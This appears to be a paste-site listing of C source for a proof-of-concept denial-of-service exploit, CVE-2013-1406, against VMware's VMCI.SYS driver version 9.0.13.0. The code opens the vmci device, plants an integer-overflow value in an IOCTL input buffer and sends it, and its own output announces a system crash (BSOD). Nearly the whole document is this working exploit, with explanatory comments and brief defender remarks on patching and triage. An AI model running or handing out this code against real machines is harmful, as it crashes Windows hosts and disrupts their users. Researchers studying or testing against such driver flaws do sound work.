0x16_7ton

CVE-2013-1406 PoC DOS exploit

Mar 5th, 2013
  1. /*
  2. This PoC applies only to
  3. VMCI.SYS version 9.0.13.0
  4. */
  5.  
  6. #include "stdafx.h"
  7. #include "windows.h"
  8.  
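  /* Number of int elements in the input and output buffers passed to DeviceIoControl. */
  #define count_massive 0x189
  /* I/O control code that this listing sends to the \\.\vmci device. */
  #define ioctl_vmsock  0x8103208C
  /*
   * Value written to element 4 of the input buffer; the author's comment at the
   * point of use calls that field the integer-overflow parameter.  The driver-side
   * arithmetic is not part of this listing.
   * Defined without a trailing semicolon so the macro can be used inside an
   * expression as well as on the right-hand side of an assignment.
   */
  #define integer_overflow_size 0x12492492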
  12.  
  13.  
  /*
   * Entry point of the CVE-2013-1406 denial-of-service PoC.
   *
   * Steps, in order: print a banner, open the \\.\vmci device with GENERIC_READ
   * access, zero the input buffer, store integer_overflow_size in element 4,
   * sleep, issue one ioctl_vmsock request with equally sized input and output
   * buffers, then close the handle.  argc and argv are unused and 0 is returned
   * on every path; the result of DeviceIoControl is not inspected.
   *
   * Only the user-mode request is visible here; how the driver processes
   * element 4 is not.  The listing's header restricts it to VMCI.SYS 9.0.13.0 and
   * its own output announces a BSOD, i.e. a crash of the Windows system running
   * that driver.  For defenders: the remedy is the vendor update for
   * CVE-2013-1406 (fixed builds are not named on this page), and a process that
   * is not part of the VMware tooling opening the vmci device shortly before a
   * bugcheck is a reasonable thing to triage.
   */
  int _tmain(int argc, _TCHAR* argv[])
  {
      int request[count_massive];
      int reply[count_massive];
      int buf_bytes = count_massive * sizeof(int);   /* same size for both buffers */
      DWORD returned;
      HANDLE dev;

      printf("**************************************************\r\n");
      printf("[*]0x16/7ton CVE-2013-1406 simple PoC DOS exploit*\r\n");
      printf("**************************************************\r\n");

      /* Open the VMCI device object; read access and shared read/write only. */
      dev = CreateFileW(L"\\\\.\\vmci",
                        GENERIC_READ,
                        FILE_SHARE_WRITE | FILE_SHARE_READ,
                        NULL,
                        OPEN_EXISTING,
                        NULL,
                        NULL);
      if (dev == INVALID_HANDLE_VALUE)
      {
          /* Device absent or not accessible: report it and stop. */
          printf("[-]Error: Can't open vmci device!\r\n");
          return 0;
      }

      printf("[+]vmci device opened \r\n");

      /* Input buffer is all zeroes apart from the one size field at index 4. */
      memset(request, 0, buf_bytes);
      request[4] = integer_overflow_size;

      printf("[+]After delaying we send IOCTL,prepare to BSOD \r\n");

      /* Two fixed delays (0x29a ms, then 0x1000 ms) before the request goes out. */
      Sleep(0x29a);
      Sleep(0x1000);

      DeviceIoControl(dev, ioctl_vmsock,
                      request, buf_bytes,
                      reply, buf_bytes,
                      &returned, NULL);
      CloseHandle(dev);

      return 0;
  }